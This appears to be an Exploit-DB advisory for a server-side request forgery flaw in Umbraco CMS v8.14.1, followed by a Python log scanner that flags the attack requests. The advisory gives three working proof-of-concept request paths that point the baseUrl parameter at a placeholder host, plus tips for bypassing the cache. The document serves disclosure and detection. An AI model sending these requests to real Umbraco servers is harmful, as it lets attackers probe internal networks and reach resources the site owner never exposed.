Umbraco v8.14.1 – ‘baseUrl’ SSRF

  • Author: NgoAnhDuc
    Date: 2021-10-29
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50462/
  • # Exploit Title: Umbraco v8.14.1 - 'baseUrl' SSRF
    # Date: July 5, 2021
    # Exploit Author: NgoAnhDuc
    # Vendor Homepage: https://our.umbraco.com/
    # Software Link: https://our.umbraco.com/download/releases/8141
    # Version: v8.14.1
    # Affect: Umbraco CMS v8.14.1, Umbraco Cloud
    
    Vulnerable code:
    
    Umbraco.Web.Editors.HelpController.GetContextHelpForPage():
    https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/HelpController.cs#L14
    Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent():
    https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L50
    Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss():
    https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L91
    
    PoC:
    
    /umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=https://SSRF-HOST.EXAMPLE
    /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=https://SSRF-HOST.EXAMPLE/
    /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=https://SSRF-HOST.EXAMPLE/
    
    Notes:
    - There's no "/" suffix in payload 1
    - "/" suffix is required in payload 2 and payload 3
    - "section" parameter value must be changed on each exploit attempt
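
For defenders, the three request paths in the PoC give a direct log signature. The sketch below is an added example, not part of the original advisory or of Umbraco's code: it flags requests to those endpoints whose `baseUrl` host is outside an allowlist. The `ALLOWED_HOSTS` values, the combined access-log format and the sample lines are assumptions.

```python
from urllib.parse import parse_qs, urlsplit

# The three back-office endpoints named in the advisory (compared case-insensitively).
ENDPOINTS = {
    "/umbraco/backoffice/api/help/getcontexthelpforpage",
    "/umbraco/backoffice/umbracoapi/dashboard/getremotedashboardcontent",
    "/umbraco/backoffice/umbracoapi/dashboard/getremotedashboardcss",
}
# Assumption: hosts this installation legitimately fetches help/dashboard content from.
ALLOWED_HOSTS = {"our.umbraco.com", "dashboard.umbraco.org"}

def suspicious_base_url(request_target):
    """Return the baseUrl value if it targets a non-allowlisted host, else None."""
    parts = urlsplit(request_target)
    if parts.path.rstrip("/").lower() not in ENDPOINTS:
        return None
    # Match the parameter name case-insensitively; parse_qs also percent-decodes values.
    for key, values in parse_qs(parts.query).items():
        if key.lower() != "baseurl":
            continue
        for value in values:
            host = (urlsplit(value.strip()).hostname or "").lower()
            if host not in ALLOWED_HOSTS:
                return value
    return None

def scan(log_lines):
    """Yield (client_ip, baseUrl) for flagged lines of a combined-format access log."""
    for line in log_lines:
        try:
            client_ip = line.split()[0]
            request_target = line.split('"')[1].split()[1]
        except IndexError:
            continue  # not a parsable request line
        hit = suspicious_base_url(request_target)
        if hit is not None:
            yield client_ip, hit

# Constructed sample log lines (not from a real system).
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jul/2021:10:00:01 +0000] "GET /umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=https://SSRF-HOST.EXAMPLE HTTP/1.1" 200 512',
    '198.51.100.4 - - [05/Jul/2021:10:00:02 +0000] "GET /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=content&baseUrl=https://dashboard.umbraco.org/ HTTP/1.1" 200 900',
    '198.51.100.9 - - [05/Jul/2021:10:00:03 +0000] "GET /search?baseUrl=https://other.example/ HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    for ip, url in scan(SAMPLE_LOG):
        print(f"{ip} requested remote fetch from {url}")
```

Requests that omit `baseUrl` are not flagged, since the controller then uses its own default.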